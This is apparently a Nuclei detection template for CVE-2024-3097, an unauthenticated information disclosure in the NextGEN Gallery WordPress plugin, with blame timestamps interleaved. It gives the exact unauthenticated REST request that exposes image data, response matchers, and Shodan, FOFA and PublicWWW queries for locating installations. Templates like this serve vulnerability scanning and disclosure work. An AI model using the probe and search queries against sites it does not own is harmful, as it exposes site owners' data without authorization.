2024-05-14 20:00:29 +00:00
id : CVE-2024-3097
info :
name : NextGEN Gallery <= 3.59 - Missing Authorization to Unauthenticated Information Disclosure
author : DhiyanesDK
severity : medium
description : |
The WordPress Gallery Plugin –
reference :
- https://plugins.trac.wordpress.org/browser/nextgen-gallery/trunk/src/REST/Admin/Block.php#L40
- https://www.wordfence.com/threat-intel/vulnerabilities/id/75f87f99-9f0d-46c2-a6f1-3c1ea0176303?source=cve
- https://zpbrent.github.io/pocs/8-plugin-nextgen-gallery-InfoDis-20240327.mp4
- https://github.com/fkie-cad/nvd-json-data-feeds
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
cve-id : CVE-2024-3097
cwe-id : CWE-862
2024-05-31 19:23:20 +00:00
epss-score : 0.04672
epss-percentile : 0.92605
2024-05-14 20:00:29 +00:00
cpe : cpe:2.3:a:imagely:nextgen_gallery:*:*:*:*:*:wordpress:*:*
metadata :
2024-06-07 10:04:29 +00:00
max-request : 1
2024-05-14 20:00:29 +00:00
vendor : imagely
2024-06-07 10:04:29 +00:00
product : "nextgen_gallery"
2024-05-14 20:00:29 +00:00
framework : wordpress
2024-06-07 10:04:29 +00:00
shodan-query :
- "cpe:\"cpe:2.3:a:imagely:nextgen_gallery\""
- http.html:/wp-content/plugins/nextgen-gallery/
fofa-query : "body=/wp-content/plugins/nextgen-gallery/"
2024-05-14 20:00:29 +00:00
publicwww-query : "/wp-content/plugins/nextgen-gallery/"
2024-06-07 10:04:29 +00:00
tags : cve,cve2024,wordpress,nextgen-gallery,wp-plugin,info-leak,imagely
2024-05-14 20:00:29 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/wp-json/ngg/v1/admin/block/image/1"
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"success":'
- '"image":'
condition : and
- type : word
part : header
words :
- 'application/json'
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 490a0046304402204cf9cdd69982a8e227f0c764131f0bd599577b93aa5bd10b754c70d912602c36022043662719fb8ead44e0995b7428e6c96ea3079f74f0382eb42bc39d181c0b284a:922c64590222798bb761d5b6d8e72950
